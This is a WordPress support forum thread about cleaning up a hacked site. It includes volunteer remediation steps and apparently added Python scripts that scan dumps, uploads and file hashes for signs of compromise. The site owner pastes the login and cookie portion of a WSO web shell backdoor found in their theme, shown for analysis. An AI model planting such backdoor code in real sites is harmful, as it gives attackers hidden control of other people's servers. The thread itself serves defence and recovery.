• Resolved syzygist


    I discovered I’d been hacked when trying to download a theme backup file triggered an antivirus alert. I eventually identified the infected file as an extra file in my theme’s Functions directory that was named very similarly to a file that was supposed to be there (but had a different date from everything else in the directory, aha!).

    I have the content of that file as text, but I don’t know how to safely post it. It’s mostly long alphanumeric strings with a few interspersed php commands, but I don’t know any php, so I can’t deduce anything from it.

    Although I have not seen any impact on my public site thus far, I seem to have a Google AdSense plugin that I’m pretty sure I didn’t have before, and all the files in that directory have the same date as the infected file (and a time 5 minutes earlier).

    My login name was also changed back to admin. I’m guessing that’s how someone else was able to install a plugin.

    I have not done anything so far other than removing the infected file, as I am unsure of the best way to proceed. I would really appreciate it if someone would tell me how to safely post the contents of the infected file so I can get feedback to any clues it might hold.

    Also, I’m not sure what to do about the AdSense plugin. I haven’t changed any passwords yet because I know it won’t do much good if I haven’t rooted out backdoors, but I don’t know how to do that.

    The site is large and fairly complex. I haven’t been posting much lately, so the last backup I have is from May. I am really hoping to avoid rolling back to that, though, as I have comments and other things I don’t want to lose. I’m also hoping to avoid manually uploading a fresh WordPress installation – I did that once, and it took all day!

    I have low intermediate html skills, and no knowledge of php, so use easy words, please!

Viewing 10 replies - 1 through 10 (of 10 total)
  • Hello, syzygist, & welcome to the WordPress support forum. Unfortunately, when a hack has occurred, finding 1 infected file may (& probably does) mean there are others.

    Clearing a hack is a lot of work. I sincerely advise you not to take shortcuts, as doing so will likely only cause your site to become reinfected. The following is a long process, but a necessary one.

    A resource you can go to is:

    When dealing w/a site compromise, the objectives are twofold:
    1) Fix the site; &
    2) Fix backdoors that the hacker used to gain entrance into your site, so this hopefully will not happen again.

    Most people place great emphasis on objective #1, but, in truth, the 2nd one is actually the most important, as, without it, your site will continue to be reinfected.

    Here are the steps to take.

    First, notify your host, as this might be a serverside hack as opposed to simply a site compromise. Also, if you’re on shared hosting, the hack has the potential to compromise the entire server. Additionally, you may wish to take the site offline, & your host can help you do this. They might not help you–then again, they might. You won’t know unless you notify them. If they say it’s not their responsibility, (& it really may not be), then please continue reading.

    Second, scan any devices you will use to log onto your website for malware. It does no good to change credentials, etc., which you will need to do, if malware phones them home to their command & control center. It’s actually better to do more than 1 scan, each using a different program, as no single malware scanner can detect everything.

    Third, secure your network. Definitively use secure FTP as opposed to regular FTP. The port used for secure FTP varies from host to host. Many use port 22, some 2222, while others use different ports altogether. Check their knowledge base or call their support. You can ask this question when you notify them of the compromise in the first step.

    Never log onto your site using a public hotspot, such as those in hotels, cafes, etc. Make sure you’ve changed the default password, SSID, (&, if applicable) the username on your router/modem. If you don’t use wireless, turn it off in your router’s options.

    All these steps are required to ensure that no one can snoop your credentials, etc.

    Now that the device you’ll use to fix your site, as well as your network, is secure, it’s time to direct your attention to actually fixing your site.

    Next, please log into your website control panel from a secure connection and change all passwords, including those to any databases you may have set up. This includes your control panel/FTP credentials & your WordPress database.

    Next, take a backup of your website’s files. Be certain to label it such that the label contains both the date you backed it up on, as well as the word “hacked”–we certainly don’t want you accidentally restoring this backup! This can be helpful, though, in terms of perhaps being able to determine how this occurred, though my feeling is that it likely did so because of an outdated site. Probably you should just back up your web root. Depending on your host, it might be called public_html, htdocs, www, or /.

    Please also back up your database as well. The article at
    shows you how to do that, in case you need it. The section regarding phpMyAdmin is likely the most relevant to your case.

    It’s going to be necessary to search that database file to see if any evidence of the hack exists there. That can be done by opening the file in a text editor. To start off with, consider searching for the words:

    <? php;

    You might also wish at this point to backup your WordPress content. To do that:
    * Log into your WordPress dashboard.
    * Go to ‘Tools > Export’.
    * Choose to export all content.

    While in your dashboard, go to ‘Users > All Users’ and delete any users there that you don’t recognize, especially administrators.

    Also be advised that sometimes supposed image files can contain code, so open all your image files, particularly in your uploads folders, to ensure they really are images & don’t contain code. Better yet, if you have the images on your machine, replace files in the uploads folders with them.

    If you find nothing, either in your database or in your /uploads folders, then the next step is to delete, then completely reinstall WordPress, as well as any plugins or themes you were using. I also advise creating an entirely new database w/a new user & password.

    Please also let someone knowledgeable look at your .htaccess file so they can make certain no backdoor code exists there.

    In summary, here are the steps:
    1) Back up your WordPress files, including core, themes, & plugins;
    2) Back up your database using phpMyAdmin;
    3) Look through the database to ensure there is no evidence of the hack;
    4) Search the uploads folders for image files that contain code;
    5) Let someone knowledgeable look at your .htaccess file.
    6) If you have doubts about your database, please have a professional take a look.

    I’m sorry this happened to you. I hope this helps. Please let us examine your .htaccess file, & please let us know if you require additional help.
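The two checks the reply above asks for (searching the database dump for PHP code markers, and making sure the files in the uploads folders really are images) can be done with a small read-only script. The following is an added example, not code from the thread or from WordPress; the SQL dump text and the two "uploads" files it scans are constructed inline, and it never runs anything it finds, it only reports where the markers are.

```python
"""Added example: read-only scanner for a WordPress database dump and an
uploads folder. (1) scan_text() reports lines containing PHP code markers
such as <?php, eval(, base64_decode( and gzinflate(, which have no business
inside post content or options. (2) scan_uploads() flags files whose
extension says "image" but whose first bytes are not an image magic number,
or which contain a PHP open tag anywhere. All sample input is constructed."""
import os
import re
import tempfile

# Markers a clean database dump should not contain (matched case-insensitively).
SUSPICIOUS_TOKENS = ("<?php", "eval(", "base64_decode(", "gzinflate(")
TOKEN_RE = re.compile("|".join(re.escape(t) for t in SUSPICIOUS_TOKENS),
                      re.IGNORECASE)

# Magic bytes of the image types usually found in wp-content/uploads.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def scan_text(text):
    """Return (line_number, token, line_excerpt) for each suspicious token found."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in TOKEN_RE.finditer(line):
            hits.append((lineno, m.group(0).lower(), line.strip()[:80]))
    return hits


def check_upload_file(path):
    """Return a list of problems for one file; an honest image returns []."""
    problems = []
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as fh:
        data = fh.read()
    if ext in IMAGE_MAGIC and not any(data.startswith(m) for m in IMAGE_MAGIC[ext]):
        problems.append("extension %s but no image magic bytes" % ext)
    if b"<?php" in data.lower():
        problems.append("contains a PHP open tag")
    return problems


def scan_uploads(root):
    """Walk an uploads tree; return {relative_path: [problems]} for flagged files."""
    flagged = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            problems = check_upload_file(full)
            if problems:
                flagged[os.path.relpath(full, root)] = problems
    return flagged


def demo():
    """Run both checks on constructed data; returns (dump_hits, upload_hits)."""
    # Constructed fragment of a mysqldump: post 2 carries an injected payload.
    sample_dump = (
        "INSERT INTO wp_posts (ID, post_content) VALUES\n"
        "(1,'<p>Welcome to my site</p>'),\n"
        "(2,'<p>Hi</p><?php eval(gzinflate(base64_decode(\"AAAA\"))); ?>');\n"
        "INSERT INTO wp_options (option_name, option_value) VALUES ('siteurl','https://example.com');\n"
    )
    dump_hits = scan_text(sample_dump)
    with tempfile.TemporaryDirectory() as uploads:
        os.makedirs(os.path.join(uploads, "2014", "06"))
        # a genuine (tiny) GIF header: passes both checks
        with open(os.path.join(uploads, "2014", "06", "logo.gif"), "wb") as fh:
            fh.write(b"GIF89a" + b"\x00" * 16)
        # a PHP script renamed to .jpg: wrong magic AND contains a PHP tag
        with open(os.path.join(uploads, "2014", "06", "photo.jpg"), "wb") as fh:
            fh.write(b"<?php echo 'hello'; ?>")
        upload_hits = scan_uploads(uploads)
    return dump_hits, upload_hits


if __name__ == "__main__":
    dump_hits, upload_hits = demo()
    for lineno, token, excerpt in dump_hits:
        print("dump line %d: %s  | %s" % (lineno, token, excerpt))
    for rel, problems in upload_hits.items():
        print("uploads/%s: %s" % (rel, "; ".join(problems)))
```

To use it on a real site, pass the text of the phpMyAdmin export to `scan_text()` and the downloaded `wp-content/uploads` folder to `scan_uploads()`; every hit still needs a human look, since a tutorial post that quotes PHP code will also match.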

    Thread Starter syzygist


    Hi Jackie,

    Many thanks for your response. Here is what I have done so far (not necessarily in order):

    Deleted the infected file that was in my theme’s Functions folder. I think it might have been a backdoor, not that I have any familiarity with such things, or with php, but there was stuff about passwords and cookies in it. I’ll post it, if someone can tell me how to do that safely.

    Created a new admin account with a strong password, and deleted the one the hacker had changed back to “admin”

    Changed the admin user login account from phpMyAdmin, after already changing it from the WordPress dashboard (my webhost was insistent on this)

    Changed my Cpanel and FTP passwords

    Had secure FTP implemented on my account, and updated my login info in my FTP client

    Changed the “secret passwords” in the wp-config files of all 3 of my WordPress installations.

    Checked all my htaccess files (they matched the ones that are posted on www.ads-software.com)

    Went through every directory of public html looking for files with the same dates as the infected file (this is how I discovered that I had a new GoogleAdsense plugin that I hadn’t installed).

    Uninstalled GoogleAdsense plugin

    Downloaded backups of my 3 databases (I had already backed up the rest of my site the day of the hack)

    Searched the sql file of my top level domain for the 4 strings you mentioned. There were none for the 2nd, 3rd & 4th strings. I did find a couple of scripts to run videos linked in the WordPress news section, but they appeared to link to legit URLs

    However, this section near the beginning of the sql file looked a little weird (not that I’ve ever looked at my sql file before):

    LOCK TABLES wp_comment_notifier WRITE;
    /*!40000 ALTER TABLE wp_comment_notifier DISABLE KEYS */;
    INSERT INTO wp_comment_notifier (id, post_id, name, email, token) VALUES —-then a bunch of email addresses with additional number codes and user names, about half of which had the same user name despite the different emails (this might be someone I blocked several years back before I learned other ways to manage comment spam). My site does not have users. These were alphabetical, but only went through D ——–
    /*!40000 ALTER TABLE wp_comment_notifier ENABLE KEYS */;

    I have been in touch with my webhost for several days. Frankly, they couldn’t care less. They had already scanned my files and told me they were clean before I found the infected file. They continue to tell me everything’s fine, like I’d believe them after that!

    When I asked why my raw logs were in Chinese, they said something vague about the scripts they were using. It wouldn’t surprise me at all if the infection came from the server. There have been intermittent service outages for several weeks. However, I admit my username and password weren’t as strong as they could’ve been.

    The hacked theme file was in the top level domain. I also have an add-on domain, and the add-on domain has a sub domain. There were no files with the hack date in add-on and subdomain directories, and their htaccess files looked fine, but I changed the wp-config passwords anyway. Do I also have to change my login passwords for the other two domains?

    syzygist, I understand you’re trying not to reinstall, but w/a site compromise, it really is the best way. Export your content, backup any folders that have your files, i.e., uploads, delete the entire site, create a new database, & reinstall. You can then import your content. Make certain none of your image files in the uploads folders contain php code. I know it’s a hassle. I’ve fixed many a hacked site, & it purely bites. But I really am afraid that by not doing so, you’re going to end up w/a reinfected site. It’s bad for you, it’s worse if your visitors end up getting their computers infected.

    & yes–by all means–change every password on every domain you’ve got–please.

    My email is available in my profile, I believe. If you’d like to send the file for my analysis, feel free. It always interests me to see what these miscreants do. You can put code in backticks, i.e. code but if it’s long, as you state, then there may not be sufficient space here.

    Thread Starter syzygist


    Here are my htaccess files. The files for the add-on domain and its subdomain are the same. The first line in both of them had to be noted out recently, as it was causing several of my dashboard panels not to appear. My webhost edited the htaccess file for the add-on domain a few days back (before I discovered the hack). Not sure why they noted the problematic line out rather than removing it, but I figured (with reservations) they knew what they were doing. I noted out the same first line in the subdomain file myself yesterday when the dashboard displayed the same problem.

    #AddHandler application/x-httpd-php52 .php .php5 .php4 .php3
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    # END WordPress

    Here is the htaccess file for the top level domain (in which the infected file was found). I have both the .com and the .net registered. I use the .net, and the .com is parked, and redirects to the .net:

    RewriteEngine on
    RewriteCond %{HTTP_HOST} ^mydomain\.com$ [OR]
    RewriteCond %{HTTP_HOST} ^www\.mydomain\.com$
    RewriteRule ^/?$ "http\:\/\/mydomain\.net" [R=301,L]
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    # END WordPress

    Here is the text of the infected file with the php tags removed from the beginning and end (since I don’t know much about php, I’m playing it safe):

    ##   ##   ###              # ####        ####  #####
    	    #  #  # #  # # # # ##     ###   #       ####        #
    	   #####  #  # # # # ##      #  #  #           #      #
    	   #   #  #   #  # # #       #### #####     ####     #######
    $auth_pass = "ee48d18bd2257225fd94ffe54d0d5480";
    function wsoLogin() {
    	die("<pre align=center>	<img alt='Proble Officer' src='' />
    <form method=post>Password : <input type=password name=pass><input type=submit value='>>'></form></pre>");
    function WSOsetcookie($k, $v) {
        $_COOKIE[$k] = $v;
        setcookie($k, $v);
    if(!empty($auth_pass)) {
        if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
            WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
        if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))

    It looks like some sort of ASCII logo at the top, but I can’t make it out. Do hackers do that?

    Thread Starter syzygist


    Can anyone translate for me what the php code in the hacked file does? My newly-created admin user was once again hijacked, with the username changed to admin, and the password changed. I was able to get back in to my site, but I don’t know that there’s much point to creating new users if they’re just going to get hijacked again.

    I would also like to understand how the hackers were able to upload files to my WordPress installation. Does this mean they have FTP access? If that is the case, don’t I need to be worried about files above my public_html directory?

    While I appreciate the responses thus far, I don’t think the respondents quite understand how complex and overwhelming all this is for someone who isn’t regularly mucking about in the WordPress backend, and moving/restoring sites. It’s not just a case of doing something I already know how to do and have done many times before. I have to learn how to do it first. When I talk about it taking days, I am not exaggerating.

    And I don’t have days. Please understand that I mean this literally, I am not just expressing an unwillingness to use my time that way. I have limited time to spend on this, which does not in any way express that it is unimportant to me, but is just the reality of my life, which is already a juggling act, without the added stress of trying to figure this all out.

    The top level site is large and complex, with a number of plugins that connect with external accounts, such as polls and social media. It has hundreds of posts and images. The subdomain is my business site. Both of these sites represent countless hours of effort and study on my part, and are very important to me.

    I would really appreciate some help here.

    Hello, syzygist. I know it’s hard to believe this, but I truly understand you’re overwhelmed, angry, frustrated, & scared your work is going to go up in flames. I hear that. I really do.

    Unfortunately, a hack requires at least some degree of technical expertise–more than just a little, actually. There are many ways the criminals can gain entrance to a site, the most common of which are sites that are outdated & passwords that are weak. Sometimes, also, especially if you’re on shared hosting, someone else’s compromised site can cause yours to become compromised as well. This is why I suggested initially that your host be notified of the hack.

    I also suggested in my initial post that you change your control panel password, as this would hopefully stop the cybercriminals from further FTP access, if indeed they have it. Having said that, there’s virtually assuredly a backdoor on your site at this point, so unless that’s found, it may not initially prove helpful. It needs to be done nonetheless.

    These bad actors can upload bad files to your uploads folders, they can put code in files in other folders on your site, & even insert code into your database. Trying to find every instance can be a difficult task at its best, & it’s why I basically recommended reinstalling, being sure, however, that the database(s) is/are clean.

    If you feel incapable of dealing w/this–& many folks do–then might I suggest you consider hiring a professional to help you w/this. I’ll look at the text of your file & see if I can’t provide some insights.

    I’m truly sorry this happened to you–more than I can express, truthfully.

    Thread Starter syzygist


    Thanks for the sympathetic responses. It’s very stressful – I really wish I could afford to have someone else fix it for me, believe me! And then my AV program started identifying this page as a threat because of the text I posted and blocking access! I did finally figure out the way around that.

    Today I ran two different malware scanners on my computer, as Jackie suggested. They found what appeared to be a trojan and a related PUP in an AppData temp file of a user account on my computer that I rarely log in to. I removed them both (along with about 3 GB of tracking cookies!). They were dated last year, for what that’s worth, so I don’t know whether they were related to the current problem or not.

    Then I installed and ran the Exploit Scanner plugin from my top level WP installation. It identified hundreds of possible threats, 134 of them in the “severe” category. While some of these are doubtless false positives (I did have it include display:none and visibility: hidden), it did drive home the point Jackie has been trying to make about how difficult it would be to track down everything the hackers installed.

    To whittle away at the dubious file list a little, I deleted all plugins and all but the active theme from the add-on subdomain, many of which were not current, as I use that domain primarily for testing. I am fine with just doing a reinstallation of WordPress in that directory, as there is no content I need to keep.

    However, I’m wondering if I should do that last. In fact, I’m wondering in general what order I should be doing things in to minimize the chance of reinfection.

    A checklist in the order that the different things should be done would be very helpful. For example, if I am going to reinstall all my plugin, theme and WordPress files, do I even need to change the passwords in my wp-config file again?

    Can anyone refer me to a beginner-friendly step-by-step for how to save all my content and reinstall?

    Hello again, syzygist. Your content resides in 2 places. The first is your wp-content/uploads folder, unless, of course, you moved that to some other locations. The 2nd place where your content resides is in the WordPress database(s) associated w/the site(s).

    In my initial post, I told you that the uploads folder was a prime place for miscreants to put their nasty files because of the decreased file permissions that are typical of those folders. I believe I also told you in that same post how to go about backing up your database, but I do understand that the instructions weren’t very specific, because hosts & the applications they use differ wildly. There simply are no standards.

    Please understand that as support forum volunteers, we are bound by certain rules, i.e., we cannot log into sites, nor can we request login information. Thus, we really cannot offer to assist w/these types of problems. We also don’t know your passwords, i.e., when you make a password on www.ads-software.com, those are encrypted heavily, so we have no access. Please absolutely *do not* post them here. We don’t want to know them.

    I truly understand it must seem as though we’re not being very helpful. We’re trying, but there’s only so much we can do given the constraints under which we operate. If I had a magic wand, I’d make it go away, but…

    Could you please give us your domain?

    syzygist, you might recall in my initial post I spoke of words like “base64” & “eval”. Much of the file you pasted in is encoded in base64, but when you translate that section beginning with \x65\x76\x61\x6C\x28\x67\x7A it ends up being translated as eval (gzinflate(base64_decode(….

    Here’s what I’d advise.
    1) Backup your database. I believe I gave you a link in my initial post as to how to go about doing that. Save the backup database file to your computer.
    2) From your dashboard, go to ‘Tools > Export’. Choose to export the types of content you want, but it’s probably best you not check the ‘Attachments’ checkbox. Save the file to your computer.
    3) Backup the current site. If you don’t wish to backup the entire site, then at least backup wp-content/uploads. Also be sure to backup any other folders that have content which you have generated, i.e., pictures, documents, music, etc. If you do backup the entire site, then, as I mentioned previously, label that backup w/at least the date & the word hack.
    4) Once the site backup is complete, delete the site.
    5) Likely the easiest way, if your hosting provider has a 1-click installer in your control panel, is to use that to install WordPress.
    6) Upload *fresh* copies of any themes & plugins you use. Also reupload your wp-content/uploads folder & any other user-generated content.
    7) Go to ‘Tools > Import’ & import your content.

    There are other ways if glitches occur–& they can–but this is likely the most straightforward way.

    WordPress has an IRC support chat channel. I’m sure there’s always someone up there who would be able to help, &, if we could arrange schedules, I’d be happy to make an appearance up there for some 1-on-1, if you think it would help.
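The decoding described two posts up (hex escapes that spell out `eval(gz`, wrapping a base64 blob that PHP's gzinflate() unpacks) can be done statically, so the payload can be read without ever being run. The script below is an added example, not code from the thread or from the infected file: it turns `\x65\x76\x61\x6C\x28\x67\x7A` back into readable text and then peels nested `eval(gzinflate(base64_decode('...')))` layers one at a time. The nested sample it decodes is constructed here from a harmless `echo` statement; the pattern it recognises (the exact three-function nesting) is an assumption, real droppers vary.

```python
r"""Added example: static unwrapping of two obfuscation layers seen in PHP
droppers. unhex() rewrites \xHH escapes as the characters they encode;
unwrap_all() repeatedly decodes eval(gzinflate(base64_decode('...'))) using
zlib in raw-deflate mode (wbits=-15), which is what PHP's gzinflate() reads.
Nothing is executed; the output is text for a person to read."""
import base64
import re
import zlib

HEX_ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{2})")
# eval( gzinflate( base64_decode( '<base64>' ) ) )  -- whitespace tolerant
WRAPPED_RE = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)\s*\)",
    re.IGNORECASE,
)


def unhex(s):
    """Replace every \\xHH escape with the character it stands for."""
    return HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), s)


def gzinflate(data):
    """PHP gzinflate() expects raw deflate data with no zlib/gzip header."""
    return zlib.decompress(data, -15)


def unwrap_once(code):
    """If code is eval(gzinflate(base64_decode('B64'))), return the inner code, else None."""
    m = WRAPPED_RE.search(code)
    if not m:
        return None
    blob = base64.b64decode(re.sub(r"\s+", "", m.group(1)))
    return gzinflate(blob).decode("utf-8", errors="replace")


def unwrap_all(code, max_layers=20):
    """Peel nested layers until plain code remains. Returns (code, layers_removed)."""
    layers = 0
    code = unhex(code)
    while layers < max_layers:
        inner = unwrap_once(code)
        if inner is None:
            break
        code = unhex(inner)
        layers += 1
    return code, layers


def wrap(code):
    """Constructed test input: wrap code the way a dropper would (deflate + base64)."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = comp.compress(code.encode()) + comp.flush()
    return "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(raw).decode()


def demo():
    """Decode the escaped fragment quoted in the reply and a two-layer constructed sample."""
    hex_sample = r"\x65\x76\x61\x6C\x28\x67\x7A"
    inner = "echo 'hello from the innermost layer';"
    nested = wrap(wrap(inner))  # droppers often stack several layers
    return unhex(hex_sample), unwrap_all(nested)


if __name__ == "__main__":
    plain, (final_code, layers) = demo()
    print("hex escapes decode to:", plain)
    print("peeled %d layer(s); innermost code: %s" % (layers, final_code))
```

When the innermost layer is not another wrapper, `unwrap_all()` stops and hands back whatever is left, which is the code a human should read; the `max_layers` cap guards against a blob that decodes to itself forever.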

    Thread Starter syzygist


    For others who encounter this problem, I highly recommend the plugin WordFence. As Red Deer Web Design mentioned, it can check WordPress core, plugin and theme files against a repository of the latest released version, and find hacker files masquerading as something else. It was so sensitive, it found files that differed from the original by only one character. It also identified files that were not part of a normal installation. WordFence scans turned up several infected files that I never would’ve found on my own.

    It can also block new accounts with the username “admin” from being created, which was very helpful in my situation, and you can set your firewall to automatically block IPs that engage in questionable behavior (such as repeatedly trying to log in, or access non-existent files). All of the options are explained right on the spot where you choose the setting, in beginner-friendly language with recommended settings.

    WordFence also now notifies me immediately when someone logs in to my dashboard or makes any changes to my installation.

    Last, but not least, WordFence lets you watch what site visitors are doing in real time. This is very useful if you know a hacker is currently attacking you, as you can block their IP address. It’s also interesting even if you aren’t being hacked!

    It runs automatic scans, and you can also scan manually. It also has a fast cache that was more user-friendly and a lot less complicated than other plugins I have tried that were strictly for caching.

    All of the above is in the free version, and was extremely helpful to me. So far, I seem to have been successful at locking the hacker out without having to reinstall all of my sites. I installed WordFence on all three of my domains, but I don’t know whether I needed to, as the top-level installation catches things in the add-on and subdomains.

    I am not in any way affiliated with the developers of WordFence, in case you were wondering. Check them out, you’ll see that a lot of their users talk about them in glowing terms. I only wish I had found them sooner, ideally *before* I was hacked – maybe I never would have been!
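The check the post above credits to WordFence (comparing every core, theme and plugin file against a known-good copy, so that a one-character change or a look-alike extra file stands out) reduces to hashing two directory trees and diffing the results. The script below is an added example, not WordFence's code and not from the thread: it builds a SHA-256 manifest of a clean tree, then reports files that are modified, extra, or missing in the live tree. The sample trees, file names and contents are constructed inline; on a real site the clean tree would be a freshly downloaded copy of the same WordPress, theme and plugin versions.

```python
"""Added example: file-integrity comparison of a live WordPress tree against
a manifest built from a known-good copy. build_manifest() hashes every file;
compare() returns sorted lists of MODIFIED, EXTRA and MISSING paths. The
demo() tree is constructed here and is not a real site."""
import hashlib
import os
import tempfile


def sha256_file(path):
    """SHA-256 of a file, read in chunks so large uploads do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """{relative posix path: sha256} for every file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def compare(manifest, live_root):
    """Diff a live tree against the known-good manifest."""
    live = build_manifest(live_root)
    return {
        "modified": sorted(p for p in manifest if p in live and live[p] != manifest[p]),
        "extra": sorted(p for p in live if p not in manifest),
        "missing": sorted(p for p in manifest if p not in live),
    }


def _write(root, rel, text):
    """Helper for the constructed sample tree."""
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as fh:
        fh.write(text)


def demo():
    """Constructed clean vs. live trees: one edited core file, one look-alike extra file."""
    clean_files = {
        "wp-includes/version.php": "<?php $wp_version = '1.0.0';\n",
        "wp-content/themes/mytheme/functions.php": "<?php add_theme_support('post-thumbnails');\n",
        "wp-content/themes/mytheme/functions/widgets.php": "<?php // widget setup\n",
    }
    with tempfile.TemporaryDirectory() as clean, tempfile.TemporaryDirectory() as live:
        for rel, text in clean_files.items():
            _write(clean, rel, text)
            _write(live, rel, text)
        # one character changed in a core file: the hash no longer matches
        _write(live, "wp-includes/version.php", "<?php $wp_version = '1.0.1';\n")
        # an extra file named like its neighbour, dropped into the theme's functions folder
        _write(live, "wp-content/themes/mytheme/functions/widget.php",
               "<?php // not part of the theme\n")
        manifest = build_manifest(clean)
        return compare(manifest, live)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind.upper() + ":", ", ".join(paths) or "(none)")
```

A file listed under `extra` inside wp-content/uploads is usually just a user upload, so that folder is better handled by the image-content check than by a manifest; everything else under core, themes and plugins should match the clean copy exactly.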

  • The topic ‘Trojan changed login name, installed Google AdSense’ is closed to new replies.